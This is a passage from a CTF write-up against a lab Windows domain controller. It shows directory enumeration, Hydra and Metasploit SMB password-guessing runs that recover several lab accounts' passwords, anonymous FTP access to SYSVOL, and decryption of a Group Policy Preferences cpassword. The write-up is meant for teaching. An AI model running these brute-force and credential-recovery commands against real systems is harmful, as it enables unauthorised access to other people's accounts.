From the CTF perspective, we have completed the mission. But, from a penetration testing perspective, we are far from being done.
Other attacks
If this host was not vulnerable to EternalBlue, what else can we find to attack this host? Going back to the Nmap results, we can see that HTTP is running on this host.
Let's inspect the site to see if there is something useful there. Since we like command-line utilities, we will use the curl
command to view the site's content.
andrew@kali:~$ curl http://172.20.20.37
andrew@kali:~$ curl http://172.20.20.37 <head> </head> <body> <h2> Scoville Lab Informatics Platform -- Under Construction!<br><br> Please contact our administrators if you have any questions:<br><br> jace.le<br><br> fern.scott<br><br> </H2> <img src="Capsaicin_3D.png"><br><br> Photo courtesy: https://dataverse.harvard.edu/dataset.xhtml?persistentId=doi:10.7910/DVN/F34GVS </body> </html>
From a CTF perspective, we should inspect the image file to see if something we can use. That said, we will download the image file and look at the strings
command's output.
andrew@kali:~$ wget -q http://172.20.20.37/Capsaicin_3D.png ; strings Capsaicin_3D.png -n 10
andrew@kali:~$ wget -q http://172.20.20.37/Capsaicin_3D.png ; strings Capsaicin_3D.png -n 10 3:aahqHa Y rq/i@mahq8 v'.ahqHa$u' aC#+0lhh`04< ($$lPhH8A!! $BPHHhP8!A r: '($$lPHH 6($$,PD !@ /8'sD&6z9l J/$lPhH0($$(; J/$lPhH8AQ 1H ECEP0H P0H ECEP0H ECQL4 ECEP0H EC R8PP0H ECEP0H ECEP0H R8PP0H ECEP0H ECQLd@ P0H ECEP0H P0H ECEP0H SVVVVVVVVM Ar9me= S@ +pHs0HH(5{ -i( JD I uy, 5S"FI*T:0 Pm:c5D+U5T :gT<4wT
While there are other ways to inspect image files for steganography, we will ignore that at this time. We should, however, scan for hidden directories. I covered this technique in the first article of the series. I like gobuster
than any other software out there, so we will use that again.
andrew@kali:~$ gobuster dir -u http://172.20.20.37 -w /usr/share/wordlists/dirb/common.txt
andrew@kali:~$ gobuster dir -u http://172.20.20.37 -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://172.20.20.37 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2021/12/16 16:56:37 Starting gobuster in directory enumeration mode =============================================================== /users (Status: 301) [Size: 149] [--> http://172.20.20.37/users/] =============================================================== 2021/12/16 16:56:51 Finished ===============================================================
Our gobuster's output reveals that there is a directory called users. Let's view the page and see what is in there.
andrew@kali:~$ curl http://172.20.20.37/users
andrew@kali:~$ curl http://172.20.20.37/users/ <html><head><title>172.20.20.37 - /users/</title></head><body><H1>172.20.20.37 - /users/</H1><hr> <pre><A HREF="/">[To Parent Directory]</A><br><br> 10/7/2020 1:44 PM 151 <A HREF="/users/users.txt">users.txt</A><br></pre><hr></body></html>
It looks like a list of users we can use on our Windows AD attack. We will save it on a text file and use it as our user wordlist.
andrew@kali:~$ curl http://172.20.20.37/users/users.txt
andrew@kali:~$ curl http://172.20.20.37/users/users.txt # list of current lab members jace.le fern.scott summer.sloan darcy.roman troy.yates eve.barr max.clark sally.bird max.clark yoder.mullins
The command below is how to save the output to a file. Additionally, I added the cat
command to verify that we have what we need.
andrew@kali:~$ curl http://172.20.20.37/users/users.txt -s | grep -v "#" > users.txt ; cat users.txt
andrew@kali:~$ curl http://172.20.20.37/users/users.txt -s | grep -v "#" > users.txt ; cat users.txt jace.le fern.scott summer.sloan darcy.roman troy.yates eve.barr max.clark sally.bird max.clark yoder.mullins
SMB dictionary attack
We are now ready to perform an SMB dictionary attack on the Windows domain controller. Unfortunately, Hydra reduces the task to one on SMB connections. That said, it will take a long time for it to finish.
From a CTF perspective, it may not be ideal to wait for Hydra to complete. From a penetration testing perspective, it is no longer a viable method in gaining access. It is because many system administrators set account lockout settings. That said, performing a dictionary attack will result in many user calls.
Luckily, from an attacker's perspective, we found jace.le's password within a minute of running Hydra. Since we only need one account to access the desktop via RDP, we can cancel the dictionary attack process.
andrew@kali:~$ hydra -L users.txt -P /usr/share/wordlist/rockyou.txt smb://172.20.20.37
andrew@kali:~$ hydra -L users.txt -P /usr/share/wordlists/rockyou.txt smb://172.20.20.37 Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-16 19:33:04 [INFO] Reduced number of tasks to 1 (smb does not like parallel connections) [DATA] max 1 task per 1 server, overall 1 task, 143443990 login tries (l:/p:14344399), ~143443990 tries per task [DATA] attacking smb://172.20.20.37:445/ [445][smb] host: 172.20.20.37 login: jace.le password: nikita [STATUS] 14347417.00 tries/min, 14347417 tries in 00:01h, 129096573 to do in 00:09h, 1 active ^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
Alternatively, we can use a smaller wordlist when attempting a dictionary attack. In this case, we will use JtR's default wordlist. With this wordlist, we were able to get eight of nine accounts' passwords in less than five minutes.
andrew@kali:~$ hydra -L users.txt -P /usr/share/john/password.lst smb://172.20.20.37
andrew@kali:~$ hydra -L users.txt -P /usr/share/john/password.lst smb://172.20.20.37 Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-16 23:16:59 [INFO] Reduced number of tasks to 1 (smb does not like parallel connections) [DATA] max 1 task per 1 server, overall 1 task, 35590 login tries (l:10/p:3559), ~35590 tries per task [DATA] attacking smb://172.20.20.37:445/ [445][smb] host: 172.20.20.37 login: jace.le password: nikita [STATUS] 6291.00 tries/min, 6291 tries in 00:01h, 29299 to do in 00:05h, 1 active [445][smb] host: 172.20.20.37 login: summer.sloan password: butterfly [445][smb] host: 172.20.20.37 login: darcy.roman password: spongebob [445][smb] host: 172.20.20.37 login: troy.yates password: tinkerbell [445][smb] host: 172.20.20.37 login: eve.barr password: dolphins [STATUS] 7415.00 tries/min, 22245 tries in 00:03h, 13345 to do in 00:02h, 1 active [445][smb] host: 172.20.20.37 login: max.clark password: asdfghjkl [445][smb] host: 172.20.20.37 login: sally.bird password: popcorn [445][smb] host: 172.20.20.37 login: yoder.mullins password: margarita 1 of 1 target successfully completed, 8 valid passwords found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-16 23:20:54
Metasploit SMB login scanner
Alternatively, we can use the SMB login scanner module in Metasploit. This auxiliary module seems to be slower than Hydra. There are advantages to using this, but if speed is what you want, then use Hydra.
Since there is a duplicate in our original user file, we can massage that a little bit to get rid of it.
andrew@kali:~$ curl -s http://172.20.20.37/users/users.txt | grep -v "#" | sort | uniq > users.txt ; cat users.txt
andrew@kali:~$ curl -s http://172.20.20.37/users/users.txt | grep -v "#" | sort | uniq > users.txt ; cat users.txt darcy.roman eve.barr fern.scott jace.le max.clark sally.bird summer.sloan troy.yates yoder.mullins
We are ready to run Metasploit and use the SMB login scanner module. As usual, we need to set the options before we run any Metasploit module.
andrew@kali:~$ msfconsole -q
andrew@kali:~$ msfconsole -q msf6 > search auxiliary smb login Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/smb/smb_login normal No SMB Login Check Scanner 1 auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt normal No SMB NTLMv1 Login Request Corruption Interact with a module by name or index. For example info 1, use 1 or use auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt msf6 > use 0 msf6 auxiliary(scanner/smb/smb_login) > options Module options (auxiliary/scanner/smb/smb_login): Name Current Setting Required Description ---- --------------- -------- ----------- ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detected BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, use r, user&realm) DETECT_ANY_AUTH false no Enable detection of systems accepting any authentication DETECT_ANY_DOMAIN false no Detect if domain is required for the specified user PASS_FILE no File containing passwords, one per line PRESERVE_DOMAINS true no Respect a username that contains a domain name. Proxies no A proxy chain of format type:host:port[,type:host:port][...] RECORD_GUEST false no Record guest-privileged random logins to the database RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/U sing-Metasploit RPORT 445 yes The SMB service port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads (max one per host) USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts msf6 auxiliary(scanner/smb/smb_login) > set abort_on_lockout true abort_on_lockout => true msf6 auxiliary(scanner/smb/smb_login) > set pass_file /usr/share/john/password.lst pass_file => /usr/share/john/password.lst msf6 auxiliary(scanner/smb/smb_login) > set user_file users.txt user_file => users.txt msf6 auxiliary(scanner/smb/smb_login) > set verbose false verbose => false msf6 auxiliary(scanner/smb/smb_login) > set rhost 172.20.20.37 rhost => 172.20.20.37 msf6 auxiliary(scanner/smb/smb_login) > run [+] 172.20.20.37:445 - 172.20.20.37:445 - Success: 'scoville\darcy.roman:spongebob' [+] 172.20.20.37:445 - 172.20.20.37:445 - Success: 'scoville\eve.barr:dolphins' [+] 172.20.20.37:445 - 172.20.20.37:445 - Success: 'scoville\jace.le:nikita' Administrator [+] 172.20.20.37:445 - 172.20.20.37:445 - Success: 'scoville\max.clark:asdfghjkl' [+] 172.20.20.37:445 - 172.20.20.37:445 - Success: 'scoville\sally.bird:popcorn' [+] 172.20.20.37:445 - 172.20.20.37:445 - Success: 'scoville\summer.sloan:butterfly' [+] 172.20.20.37:445 - 172.20.20.37:445 - Success: 'scoville\troy.yates:tinkerbell' [+] 172.20.20.37:445 - 172.20.20.37:445 - Success: 'scoville\yoder.mullins:margarita' [*] 172.20.20.37:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
One of the good things about this module is that it can tell if the user is part of the administrator group. It makes it easier for us to identify which account to use.
Anonymous FTP
Based on our Nmap scan results, the FTP service allows anonymous login. That said, let's explore and see if we can find something there.
andrew@kali:~$ ftp 172.20.20.37 6000
andrew@kali:~$ ftp 172.20.20.37 6000 Connected to 172.20.20.37. 220-FileZilla Server 0.9.60 beta 220-written by Tim Kosse (tim.kosse@filezilla-project.org) 220 Please visit https://filezilla-project.org/ Name (172.20.20.37:andrew): anonymous 331 Password required for anonymous Password: 230 Logged on Remote system type is UNIX. ftp> dir 200 Port command successful 150 Opening data channel for directory listing of "/" drwxr-xr-x 1 ftp ftp 0 Sep 24 2020 domain drwxr-xr-x 1 ftp ftp 0 Sep 24 2020 staging drwxr-xr-x 1 ftp ftp 0 Sep 24 2020 staging areas drwxr-xr-x 1 ftp ftp 0 Sep 24 2020 sysvol 226 Successfully transferred "/"
After perusing the directories, I found an XML file worth looking at closely. I downloaded the file and viewed its contents.
ftp > dir
ftp> dir 200 Port command successful 150 Opening data channel for directory listing of "/sysvol/scoville.local/Policies/{0B1DD8A3-C022-4ED3-A506-780B7B91C56B}/Machine/Preferences/Groups" -r--r--r-- 1 ftp ftp 476 Oct 06 2020 Groups.xml 226 Successfully transferred "/sysvol/scoville.local/Policies/{0B1DD8A3-C022-4ED3-A506-780B7B91C56B}/Machine/Preferences/Groups" ftp> get Groups.xml local: Groups.xml remote: Groups.xml 200 Port command successful 150 Opening data channel for file download from server of "/sysvol/scoville.local/Policies/{0B1DD8A3-C022-4ED3-A506-780B7B91C56B}/Machine/Preferences/Groups/Groups.xml" 226 Successfully transferred "/sysvol/scoville.local/Policies/{0B1DD8A3-C022-4ED3-A506-780B7B91C56B}/Machine/Preferences/Groups/Groups.xml" 476 bytes received in 0.00 secs (9.8685 MB/s) ftp> !cat Groups.xml <!--?xml version="1.0" encoding="utf-8"?--> <groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><user clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="admin.local" image="2" changed="2020-10-07 05:33:08" uid="{C0D33E59-13B3-4C4E-8E5D-F45AC3D762E9}"><properties action="U" newname="" fullname="" description="" cpassword="E4DZ2eckuB8+4bHLageZCIe287lrIVgJk8kLPk9QdKc" changelogon="0" nochange="1" neverexpires="1" acctdisabled="0" username="admin.local"></properties></user> </groups>
After viewing the contents, the cpassword
section caught my eye. I used this as my keyword search and found this page. It talks about the vulnerability of Windows' Group Policy Preferences.
Since I am using Kali Linux, I did not want to try and run PowerShell on Linux as the versions are not one-for-one equivalent. That said, I started looking at Python scripts that can decrypt it. Unfortunately, the first one I saw was not the right tool for the job. Eventually, I found out that Kali has one called gpp-decrypt
.
andrew@kali:~$ gpp-decrypt E4DZ2eckuB8+4bHLageZCIe287lrIVgJk8kLPk9QdKc 2019*letmein
With the username and password at hand, we can access the desktop environment using RDP.
Final thoughts
There are many Windows vulnerabilities discovered in the past. In this article, we covered a few of them and exploited them. As I previously mentioned, CTFs and real-world engagements vary. Some CTFs are unrealistic in this day and age, but some are still valid. That is because businesses do not have the budget or care about security.
Some of the tactics, techniques, and procedures covered here are only applicable to CTFs. But, CTF write-ups, such as this, have some value as they serve as learning opportunities.
While the Kaos Corp environment has one or two more hosts left to explore, I may end the series here. The first article of the series was not as popular as I had hoped.
BUY ME COFFEE ☕
You might like to read
BUY ME COFFEE ☕